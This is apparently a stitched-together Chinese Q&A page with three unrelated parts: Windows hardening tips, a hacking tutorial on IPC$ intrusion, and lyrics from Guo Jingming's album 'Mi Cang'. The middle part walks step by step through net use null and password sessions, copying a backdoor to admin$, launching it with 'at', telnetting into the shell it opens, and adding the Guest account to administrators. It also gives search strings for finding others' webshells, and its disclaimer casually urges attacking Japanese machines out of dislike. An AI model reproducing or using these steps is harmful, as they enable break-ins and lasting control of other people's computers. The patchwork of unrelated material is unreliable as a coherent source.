黑客入侵电脑是不是很容易?
不一定;
防止黑客入侵电脑的方法:
一、关于电脑本身的设置
1.关闭“文件和打印共享”
文件和打印共享应该是一个非常有用的功能,但在不需要它的时候,也是黑客入侵的很好的安全漏洞。所以在没有必要“文件和打印共享”的情况下,我们可以将它关闭。
用鼠标右击“网络邻居”,选择“属性”,然后单击“文件和打印共享”按钮,将弹出的“文件和打印共享”对话框中的两个复选框中的钩去掉即可。虽然“文件和打印共享”关闭了,但是还不能确保安全,还要修改注册表,禁止它人更改“文件和打印共享”。打开注册表编辑器,选择“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NetWork”主键,在该主键下新建DWORD类型的键值,键值名为“NoFileSharingControl”,键值设为“1”表示禁止这项功能,从而达到禁止更改“文件和打印共享”的目的;键值为“0”表示允许这项功能。这样在“网络邻居”的“属性”对话框中“文件和打印共享”就不复存在了。
2.把Guest账号禁用
很多入侵是通过这个账号进一步获得管理员密码或者权限的。
打开控制面板,双击“用户和密码”,单击“高级”选项卡,再单击“高级”按钮,弹出本地用户和组窗口。在Guest账号上面点击右键,选择属性,在“常规”页中选中“账户已停用”。另外,将Administrator账号改名可以防止黑客知道自己的管理员账号,这会在很大程度上保证计算机安全。
3.禁止建立空连接
默认情况下,任何用户都可以通过空连接连上服务器,枚举账号并猜测密码。因此,我们必须禁止建立空连接。方法是修改注册表:打开注册表“HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA”,将DWORD值“RestrictAnonymous”的键值改为“1”即可。
二、 安装必要的安全软件,如360或者金山等。
三、关闭不必要的端口
黑客在入侵时常常会扫描计算机端口,如果安装了端口监视程序(比如Netwatch),该监视程序则会有警告提示。如果遇到这种入侵,可用工具软件关闭用不到的端口。
四、不要回陌生人的邮件
黑客可能会冒充某些正规网站的名义,然后编个冠冕堂皇的理由寄一封信,要求你输入上网的用户名称与密码,如果按下“确定”,你的帐号和密码就进了黑客的邮箱。所以不要随便回陌生人的邮件,即使他说得再动听再诱人也不上当。
五、更换管理员帐户
Administrator帐户拥有最高的系统权限,一旦该帐户被人利用,后果不堪设想。黑客入侵的常用手段之一就是试图获得Administrator帐户的密码,所以我们要重新配置Administrator帐号。
首先是为Administrator帐户设置一个强大复杂的密码,然后我们重命名Administrator帐户,再创建一个没有管理员权限的Administrator帐户欺骗入侵者。这样一来,入侵者就很难搞清哪个帐户真正拥有管理员权限,也就在一定程度上减少了危险性。
六、隐藏IP地址
主要方法是使用代理服务器。与直接连接到Internet相比,使用代理服务器能保护上网用户的IP地址,从而保障上网安全。代理服务器的原理是在客户机(用户上网的计算机)和远程服务器(如用户想访问远端WWW服务器)之间架设一个“中转站”,当客户机向远程服务器提出服务要求后,代理服务器首先截取用户的请求,然后代理服务器将服务请求转交远程服务器,从而实现客户机和远程服务器之间的联系。
使用代理服务器后,其它用户只能探测到代理服务器的IP地址而不是用户的IP地址,这就实现了隐藏用户IP地址的目的,保障了用户上网安全。
七、防范木马程序
木马程序会窃取所植入电脑中的有用信息,因此我们也要防止被黑客植入木马程序,常用的办法有:
1、在下载文件时先放到自己新建的文件夹里,再用杀毒软件来检测,起到提前预防的作用。
2、在“开始”→“程序”→“启动”或“开始”→“程序”→“Startup”选项里看是否有不明的运行项目,如果有,删除即可。将注册表里 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的所有以“Run”为前缀的可疑程序全部删除即可。
八、杜绝Guest帐户的入侵
禁用或彻底删除Guest帐户是最好的办法,但在某些必须使用到Guest帐户的情况下,就需要通过其它途径来做好防御工作了。首先要给Guest设一个强壮的密码,然后详细设置Guest帐户对物理路径的访问权限。
举例来说,如果你要防止Guest用户可以访问tool文件夹,可以右击该文件夹,在弹出菜单中选择“安全”标签,从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户即可。或者在权限中为相应的用户设定权限,比方说只能“列出文件夹目录”和“读取”等,这样就安全多了。
九、做好IE的安全设置
ActiveX控件和 Applets有较强的功能,但也存在被人利用的隐患,网页中的恶意代码往往就是利用这些控件编写的小程序,只要打开网页就会被运行。所以要避免恶意网页的攻击只有禁止这些恶意代码的运行。
IE对此提供了多种选择,具体设置步骤是:“工具”→“Internet选项”→“安全”→“自定义级别”,建议您将ActiveX控件与相关选项禁用。
另外,在IE的安全性设定中我们只能设定Internet、本地Intranet、受信任的站点、受限制的站点。不过,微软在这里隐藏了“我的电脑”的安全性设定,通过修改注册表把该选项打开,可以使我们在对待ActiveX控件和 Applets时有更多的选择,并对本地电脑安全产生更大的影响。下面是具体的方法:1、打开“开始”菜单中的“运行”,在弹出的“运行”对话框中输入Regedit.exe。2、打开注册表编辑器,点击前面的“+”号顺次展开到:HKEY_CURRE-NT_USER\Software\Microsoft\Windows\CurrentVersion\InternetSettings\Zones\0。3、在右边窗口中找到DWORD值“Flags”,默认键值为十六进制的21(十进制33),双击“Flags”。4、在弹出的对话框中将它的键值改为“1”即可,关闭注册表编辑器。无需重新启动电脑,重新打开IE,再次点击“工具→Internet选项→安全”标签,你就会看到多了一个“我的电脑”图标,在这里你可以设定它的安全等级。将它的安全等级设定高些,这样的防范更严密。5、最后建议给自己的系统打上补丁。
关于黑客常用术语
肉鸡就是具有最高管理权限的远程电脑。简单的说就是受你控制的远程电脑。肉鸡可以是win、Unix/Linux……等各种系统;肉鸡可以是一家公司的服务器,一家网站的服务器,甚至是美国白宫或军方的电脑,只要你有这本事入侵并控制他,呵呵。莱鸟所说用的肉鸡一般是开了3389端口的Win2K系统的服务器。
要登陆肉鸡,必须知道3个参数:远程电脑的IP、用户名、密码。
webshell是什么?这是很多朋友在疑惑的问题,什么是webshell?今天我们就讲讲这个话题!
webshell是web入侵的脚本攻击工具。简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。
为了更好理解webshell我们学习两个概念:
什么是“木马”?“木马”全称是“特洛伊木马(Trojan Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上,“特洛伊木马”指一些程序设计人员在其可从网络上下载(Download)的应用程序或游戏中,包含了可以控制用户的计算机系统的程序,可能造成用户的系统被破坏甚至瘫痪。
什么是后门?大家都知道,一台计算机上有65535个端口,那么如果把计算机看作是一间屋子,那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535扇门。每个门的背后都是一个服务。有的门是主人特地打开迎接客人的(提供服务),有的门是主人为了出去访问客人而开设的(访问远程服务)——理论上,剩下的其他门都该是关闭着的,但偏偏由于各种原因,很多门都是开启的。于是就有好事者进入,主人的隐私被刺探,生活被打扰,甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。
webshell的优点
webshell 最大的优点就是可以穿越防火墙,由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的,因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录,只会在网站的web日志中留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。
如何寻找webshel:
1,脚本攻击SQL注入
2,使用注入工具
3,在浏览器里打开百度,输入搜索关键词"在本页操作不需要FSO支持"或者"一次只能执行一个操作",然后点击搜索,很快就可以看到检索到了大量的查询结果.
黑客DOS命令或其它命令入侵他人电脑的具体步骤?
IPC$入侵
一 唠叨一下:
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).
因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!
二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.
解惑:
1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表
三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.
四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)
1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.
六 如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。
七 如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码
(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net)
八 相关命令
1)建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
4)删除一个ipc$连接
net use \\IP\ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32ntlm
输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\net user guest /active:yes
将对方的Guest用户激活
11. C:\net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
十 总结:
关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.
最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)
郭敬明《迷藏》专辑,所有歌的歌词?
[唱 片 介 绍]
郭敬明音乐小说《迷藏》
你的青春在哪里?你的梦想在哪里?
2005年青春大事件,热烈燃烧整个夏天。
少年作家郭敬明,跨文化担纲音乐制作人,公开宣告,
他要写一部可以唱的小说,一部可以听的小说。
这是将小说融入音乐专辑的奇妙构想,这是80后作家百无禁忌的大胆尝试。
[曲 目 介 绍]
十月·拾是侵蚀的蚀
时光溶解了外露的岩石。班驳粗糙的表面化成泡沫渐次消失。日复一日的夕阳侵蚀了年轻乖戾的岩石轮廓,露出成年前光滑而润泽的内里。回归线引导了所有人的回归。曾经犯过的错误。曾经失败的爱情。曾经幼稚的告白。曾经起伏的感伤。都在瞬间被上帝柔软地原谅。剩下青春轰烈的声响,像深夜的火车般开往下一个旅程。
九月·玖是久远的久
如果幸福太过久远。就会变成模糊的回忆。于是记忆中你的脸你的手你的毛衣就被分开放置在转盘不同的格子。谁都只能拿到零碎的幸福。却再也无法拼成一个完整的大写的爱。回忆里你的笑容可以染绿整个夏天。但时节却无法沿路回溯从前。
八月·捌是疤痕的疤
受过伤的身体,总会留下伤痕。我不是如同岁月般神奇的治愈师,可以平复曾经所有的伤痛。也不是如同上帝般伟大的造物主,可以撑开无限辽远的苍穹你依然很想他。依然牵挂他。依然困在他随手撒下的无风的森林。但我想带你走向另外的幸福。就算无法治愈你双目漫长黑暗的失明,也请让我一起盲目。即使不能牵引你走出繁复深邃的丛林,也会陪你看天幕渐明。
七月·柒是日期的期
你遇见谁。在日光泛滥到白热的夏天。那些探头露尾若隐若现的幸福。找不准应该出现的日期。就像我遇见你。在一个迟到了很久很久的夏季。凤凰花开满城市的每一个墙沿壁缝。花朵燃烧的国度里。花朵失了踪。溃烂在庞大雨水山路泥径中的红花对季风讲,如果早点遇见你。
六月·陆是大陆的陆
也许谁都不曾留意过。太平盛世的大陆之外,那些沉默无声的岛屿。岛屿上花开四季。大陆上草木枯荣。那些隔着遥远海洋的秘密,连南来北往的季风也无法送达。收件人地址不详。字迹潦草。超重。却永远不会是查无此人。这个人是胸腔深处最清晰的存在。他的名字,是心脏表面一整张大陆的版图。岛屿日渐靠拢。却永世无法登陆。
五月·伍是起舞的舞
所有的爱情都是如此。无数的细节堆积成一张不动声色的侧脸。你留在衣角上的小块泥斑,笑容里浅浅地浮起童话,耳麦里的音乐直指着北斗七星。摩天轮。游乐场。升起的焰火和坠落的日暮。男孩子干净的白衬衣和女孩子扎起的长发。那些温暖的日光沿着岁月的纹路缓慢流淌,化成水银,渗透进心脏的每一条罅隙和纹路。最终凝固成一千个镜面。反射出一千个随声起舞的你。
四月·肆是祭祀的祀
你说我到底是不是一个傻瓜呢。四月的风被春天软化在空气里。半流质地穿越花开的城市。我替你买了早餐抄好了笔记。在你家楼下无所事事地发呆。他们口中的愚人都是愚蠢的人么?愚蠢的人是我么?阳光沿着窗户切割进房间。风掀了掀窗帘。温暖的光芒正满满爬上你安静沉睡的脸。
三月·叁是散落的散
散落一地的,是你藏在嘴角的亲吻么?彼得·潘的童话里说,那些藏在嘴角的亲吻,都是甜蜜的糖果。那么谁可以告诉我,游乐场里到底是哪个带帽子的小丑正在兜售?我想买好大的一罐。然后。然后和你换。可是血液和骨骼。神经和皮肤。厚厚的棉衣里厚厚的绒衫。明明是有着非常质量的两个人,还是被季风一吹就散。
二月·贰是无二的二
立冬。小雪。大雪。冬至。小寒。大寒。在无法遇见第二个寂寞的人的寂寞冬天。独自行走独自唱歌独自逛街独自看着一整个世界狂欢。人们手牵手地逛着游乐园。他是她的独一。我是所有人的无二。世界充满了我们相遇的几率。我却始终无法遇见你。
一月·壹是独一的一
世界曾经颠倒黑白。如今回归绚丽的色彩。世界曾经失去声响。如今有你们陪我歌唱。夜里黑暗覆盖着左手。左手覆盖着右手。曾经牵手的手指。夜里独自双手合十。风吹沙吹成沙漠。你等我等成十年漫长的打坐。你是天下的传奇。你是世界的独一。你让我花掉一整幅青春。用来寻找你。
十.九.八.七.六.五.四.三.二.一。他和她的迷藏。开始……
[歌 词 列 表]
壹月。
独白:那些发生在1999年的事情……
那些发生在1999的事情
像是褪色的电影
荒草被时间无尽地焚烧而过
剩下曾经照片里清澈的男孩
和悲伤的女孩
没人记得也没人会问
他们何时走的
他们何时再来
一月:迷藏
那些年代 淹没在人海
曾经唱过的歌 有几首剩下来
我们站在 汹涌的人海
曾经种下的花 有多少还在开
In nineteen ninety-nine 我眼睛睁不开
In nineteen ninety-nine 没有人留下来
In nineteen ninety-nine 我的心打不开
In nineteen ninety-nine 谁独自留下来
曾经唱起歌 看荒草满山坡
In nineteen ninety-nine 我眼睛睁不开
In nineteen ninety-nine 没有人留下来
In nineteen ninety-nine 我的心打不开
In nineteen ninety-nine 谁独自留下来
荒草满山坡 唱歌的剩几个
啦……
啦……
我的男孩 学会了宠爱
他爱的恶作剧 已经想不起来
谁的女孩 摘下蓝发带
当看到旧电影 还是会哭起来
In nineteen ninety-nine 我眼睛睁不开
In nineteen ninety-nine 没有人留下来
In nineteen ninety-nine 我的心打不开
In nineteen ninety-nine 谁独自留下来
曾经牵起手 说一辈子遨游
In nineteen ninety-nine 我眼睛睁不开
In nineteen ninety-nine 没有人留下来
In nineteen ninety-nine 我的心打不开
In nineteen ninety-nine 谁独自留下来
一辈子遨游 这梦醒了没有
啦……
啦……
贰月。
独白:我记得她曾经说过……
我记得她曾经说过
一个人的世界
安静的可以听到花开的声音
她也曾经问过
到底要过多久
才会有人听懂她的世界呢?
二月:填字游戏
天黑天亮黄昏再来 记忆展开折叠再重新展开
绿灯红灯绿灯再来 人群散开聚拢在重新散开
谁像我安静的等待 沿路听到多少对白 经过几个生锈的门牌
生命有多少段空白 填字游戏我天生愚蠢填不来
未来有多少人存在 有种幸福我天生孤单等不来
寂寞有多少种对白 忘记台词我张开口却说不出来
天国有多少天使在 抬起头也看不到羽毛掉下来
曾经过去现在将来 人生海海遇见谁有多意外
那时此刻三年五载 萤火重重捉迷藏输了再来
谁给我平凡的宠爱 音容忘记笑貌掩埋 我路过谁才停的下来
生命有多少段空白 填字游戏我天生愚蠢填不来
未来有多少人存在 有种幸福我天生孤单等不来
寂寞有多少种对白 忘记台词张开口却说不出来
天国有多少天使在 抬起头也看不到羽毛掉下来
回来离开不再回来 我们等待 失望 又再次等待
夏天冬天夏天再来 手机关上之后 就不再打开
叁月。
独白:我们应该只有在年少的时候……
我们应该只有在年幼的时候
才会有这么奋不顾身的爱情吧
而当我们渐渐长大
就再也想不起那些
因为思念而失眠的夜晚了
三月:我和你之间
晴天 光是他的白衬衫
阴天 云是他的旧书签
他的脸是我的气象站
笔记之间 考卷背面 是你的笑脸
破冰船在你酒窝里 搁浅
玄武岩是你没表情的侧面
你的双眼就好象藏在博物馆里面
逛不完 每天每夜参观
你在左边 快乐停在右边
在你 和我之间 是那年永不老去的夏天
云在上面 那蓝天无限遥远
天和大地之间 有我深藏在心里的爱恋
一辈子爱不完
lalala......
动物园 我爱猴子做鬼脸
植物园静悄悄你沉默不言
游乐园 我和你站在摩天轮上面
你突然转过笑脸 说天使在顶上面
你在左边 快乐停在右边
在你 和我之间 是那年永不老去的夏天
云在上面 那蓝天无限遥远
天和大地之间 有我深藏在心里的爱恋
一辈子爱不完
lalala......
lala lalala[冬天夏天]
lala lalala......
lala lalala[爱能永远]
lala lalala......
你在眼前 天使在我后面
在你和我之间 是魔法点亮了时光剧院
舞台上面 表演可圈可点
举手头足之间 幸福像糖果化成了一片
模糊我的视线
肆月。
独白:他一直在问……
他一直在问
愚人节是属于我的节日吗
有时候我们蒙住眼睛
就可以欺骗自己
世界很黑很安全
四月:愚人
童话故事里的王子骑白马 微笑不说话
你的王子是我还是他 你怎么不回答
你美好的年华 是我爱的童话
愚人节的狂欢 我躲在角落里面
你的王子应该骑白马 对你微笑说话
不会知道我讲那笑话 像我这个傻瓜
愚人节又到了 你还笑话我吗
跟着天使看到的总是你的脸
纸飞机飞的 再高非不过从前
冬天 夏天 晴天 阴天 时光走远
纸飞机层层叠叠写满思念
不想天使偏偏降落在我的身边
纸飞机飞了一圈又回到面前
照片里面 手机背面 是你的脸
纸飞机飞过你身边 你看不见
你的光芒耀眼
我的平凡好不起眼
伍月。
独白:爱情像是糖果……
爱情像是糖果
散落在游乐场的每个地方
灯火闪亮永远不会打烊
五月:恋爱广场
眼睛挣开 你的微笑像大海
门窗打开 你在树下等待
对你撒娇 校服钮扣掉下来
捏在手里舍不得放开
心理绽放温柔的光芒
那是你微笑的眼眶
你对这夕阳姚望
像阵阵花香
就这样 靠在你的肩膀
北极星指错方向 摇摇晃晃
像这样 凝望你的脸庞
描绘着幸福的形状
恋爱广场 不打烊
耳朵打开 听你心跳像钟摆
灯亮起来 慢慢走上舞台
对你依赖 在你单车上摇摆
希望时间停住不离开
背后长出柔软的翅膀
还有我宽厚的胸膛
等电影慢慢播放 像时光流淌
要怎样 才能靠近天堂
这就是梦想的游乐场 灯火辉煌
就这样 闭上眼睛想象
猜想这幸福的形状 反复播放
就这样 靠在你的肩膀
北极星也指错方向 摇摇晃晃
像这样 凝望你的脸庞
描绘着幸福的形状
恋爱广场 不打烊
陆月。
独白:那些说不出口的话……
那些说不出口的话
那一些没有讲出来的故事
就让他算了吧
六月:他和她
看着他站在树下等着她,听到她对他撒娇说傻话
就像看到电影里,幸福完美的童话
就像看到故事里,纯白透明的傻
怎么了,突然说傻话
听说他为她种过白梅花
听说她为他留了长头发
我为什么会害怕,害怕孤单的年华
我怎能不挣扎,挣扎对他的牵挂
算了吧,让她说傻话
记得他夏天喜欢和绿茶
曾和他深夜和他讲电话
他和她会幸福吗 就像完美的童话
他和我会怎样呢 有谁能够告诉我
我不傻 我一样爱他
遇见他 他身边已有了她
起风啊,冷风替我告诉他真心话:我好羡慕她
柒月。
独白:记忆中是炎热的夏天
记忆中是炎热的夏天
他们都说夏天是恋爱的季节
可是那一年的夏天有一个男生
一个人在夕阳里哭了好久
七月:她们的漂流瓶
游乐场打烊彩灯关上
幸福被观赏悲伤游荡
玩具士兵安静望天窗
今天沮丧明天怎样
操场起风了孩子散场
喧闹的剧场电影下档
剩下我自己站在旧操场
拿起风筝慢慢放
你和她慢慢坐在我身边
我们都坐在幸福的旁边
你们的漂流瓶漂上了岸
全部漂到我悲伤沙滩
快乐和悲伤坐在我两边
我坐在时光的阴影里面
童年跳房子画下的白线
现在指着谁寂寞笑脸
姚望-她们的漂流瓶
回到旧操场眺望夕阳
曾经的故事全部散场
独自一个人听着耳机响
影子陪我捉迷藏
捌月。
独白:忘记以前的一切吧……
忘记以前的一切吧
让我们飞去北风后面的国家
住在童话里,好吗?
八月:北风后面的国家
空教室 空留和弦
颜料盒 颜色用完
大雨天 大雨下面
你为我 撑起过伞
北斗星 指向正南边
风雪天 烈日耀花眼
地平线 浮云浮上岸
弹指间 谁白发斑斑
散场之后 离开之前
年华以北 光阴以南
挥手再见
绿画板 遗落在墙边
白衬衫 你挂在房间
三年前 拍过的照片
夕阳照在窗前 消失了容颜
灯光变暗 音乐变慢
十年之后 十年之前
一切改变
椅背后面 号码之前
旧片下档 新片上演
迷藏未完
玖月。
独白:你曾经说……
你曾经说
每当摩天轮转动一圈
世界上就会有一对接吻的人
而如今散落一地的
是当年深藏在你嘴角
从未出现的亲吻吗
九月:摩天轮
一整个城市的灯都闭上眼 摩天轮 独自转
一整个秋天的黄叶都掉完 你独自 撑着伞
两杯咖啡压着两张旧照片 白拖鞋 红地毯
两只金鱼游弋方寸天地间 黑夜长 白昼短
我习惯对你写信 为你送药 替你拍照 随你登上摩天轮飘摇
我习惯独自排队 独自买票 独自骄傲 独自环绕操场慢慢跑
我习惯学你说话 学你微笑 学你奔跑 学你在阳台种满花草
也习惯独自旅行 独自背包 独自懊恼 独自画你背影的素描
寂寞是心跳 一声一声喧闹
你在那儿 不知道
三个秋天过去我就变勇敢 摩天轮 又三圈
